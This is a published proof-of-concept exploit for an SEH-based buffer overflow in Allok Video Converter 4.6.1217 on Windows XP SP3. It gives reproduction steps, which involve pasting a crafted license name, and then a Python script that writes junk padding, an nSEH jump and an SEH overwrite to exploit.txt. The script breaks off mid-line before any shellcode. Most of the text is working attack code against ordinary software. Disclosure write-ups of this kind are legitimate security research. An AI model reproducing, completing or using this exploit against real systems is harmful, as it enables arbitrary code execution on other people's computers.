# SWAMI KARUPASAMI THUNAI ############################################################################### # Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3) # Date: 06-03-2018 # Exploit Author: Mohan Ravichandran & Velayutham Selvaraj # Organization : TwinTech Solutions # Vulnerable Software: Allok Video Converter # Vendor Homepage: http://www.alloksoft.com # Version: 4.6.1217 # Software Link: http://www.alloksoft.com/allok_vconverter.exe # Tested On: Windows XP Service Pack 3 (Version 2002) # # Credit to Velayutham Selvaraj for discovering the Vulnerbility # Vulnerability Disclosure Date : 2018-03-06 # # Manual steps to reproduce the vulnerability ... #1. Download and install the "setup(allok_vconverter.exe)" file #2. Run this exploit code via python 2.7 #3. A file "exploit.txt" will be created #4. Copy the contents of the file and paste in the License Name field # Name > exploit.txt #5. Type some random character in License Code #6. Click Register and voila ! #7. Boom calculator opens # ############################################################################## import struct file = open("exploit.txt","wb") buflen = 4000 junk = "A" * 780 nseh = "\x90\x90\xeb\x10" seh = struct.pack("